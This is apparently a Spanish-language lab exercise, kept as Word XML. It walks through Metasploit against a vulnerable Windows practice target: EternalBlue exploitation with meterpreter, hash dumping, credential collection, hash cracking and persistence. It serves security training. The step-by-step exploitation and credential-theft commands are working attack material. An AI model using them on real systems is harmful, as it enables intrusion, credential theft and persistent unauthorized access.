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0" w:line="271.2" w:lineRule="auto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Prerrequisitos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002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Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003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Windowsploitable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:spacing w:before="20" w:line="271.2" w:lineRule="auto"/>
        <w:ind w:left="740" w:righ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0" w:line="271.2" w:lineRule="auto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Ejercicios Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006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Explotar la vulnerabilidad EternalBlue de Windowsploitable usando un payload meterpreter. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007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En la sesión, volcar los hashes, y comprobar si se han añadido a nuestro workspace.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008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Dejar la sesión en background y hacer post-explotación con un módulo para volcar credenciales.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009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Comprobar de nuevo que las credenciales estan añadidas en nuestro workspace.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A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Crackear los hashes almacenados en nuestro workspace usando el módulo destinado a ello.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:spacing w:before="20" w:line="271.2" w:lineRule="auto"/>
        <w:ind w:left="20" w:firstLine="0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Hacer persistencia y demostrar su funcionamiento reiniciando el sistema.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Preparativos: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IP de Windowsploitable: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192.168.1.75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de Kali Linux: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192.168.1.69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Iniciar Metasploit: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Buscamos y configuramos el exploit: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 eternalblue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exploit/windows/smb/ms17_010_eternalblue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options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RHOSTS 192.168.1.75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LHOST 192.168.1.69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Configuramos el payload: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Ejecutamos el exploit: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exploit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xmmd2ok0cum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Volcamos los hashes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Una vez en la sesión de Meterpreter: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hashdump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dbzbtoyu3pm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Dejamos la sesión en segundo plano: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meterpreter &gt; background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066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7xzkmv2hgcl4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4. Post-explotación con un módulo para volcar credenciales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Buscar y usar el módulo para volcar credenciales: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search post/windows/gather/credentials/credential_collector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post/windows/gather/credentials/credential_collector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Configurar y ejecutar el módulo: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SESSION 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h3k9ntgd2dby" w:id="3"/>
      <w:bookmarkEnd w:id="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5. Verificar las credenciales en la base de datos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Verificar las credenciales almacenadas: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creds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308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2tsi18yy3z7b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6. Crackear los hashes almacenados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Buscar y usar el módulo para crackear hashes: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search hash_crack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auxiliary/analyze/crack_windows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Configurar y ejecutar el módulo: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set WORKSPACE default  # Podemos ponerle el nombre que queramos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905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uh8gtdulb9hu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7. Establecer persistencia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Buscar y usar el módulo de persistencia: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 persistence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exploit/windows/local/persistence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832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Configurar y ejecutar el módulo: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set SESSION 1 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LHOST 192.168.1.69  # Mi IP de Kali Linux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663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Verificar si una nueva sesión de Meterpreter se abre automáticamente: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t xml:space="preserve">sessions -i &lt;ID_de_la_nueva_sesión&gt;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78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